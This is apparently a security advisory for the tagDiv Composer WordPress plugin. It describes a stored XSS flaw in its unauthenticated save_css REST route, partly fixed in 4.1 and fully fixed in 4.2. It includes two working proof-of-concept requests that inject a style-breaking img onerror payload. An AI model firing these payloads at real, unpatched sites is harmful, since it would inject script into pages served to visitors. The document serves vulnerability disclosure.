Description The plugin, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks. Note: The issue was partially fixed in 4.1 (still exploitable by Admin+ as only authorisation was added) and fully fixed in 4.2
Before 4.1:
1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Run the following code in the browser console while logged out:
fetch( '/wp-json/tdw/save_css', {
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E",
method: "POST",
} );
In version 4.1, exploitable by Admin:
1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Log in as an admin, and run the following code in a browser console within WP Admin:
await wp.apiRequest( { path: 'tdw/save_css', type: 'POST', data: { compiled_css: "</style><img src=x onerror=alert('XSS-Checker')><style>" } } );
3. Load a frontend page to see the XSS.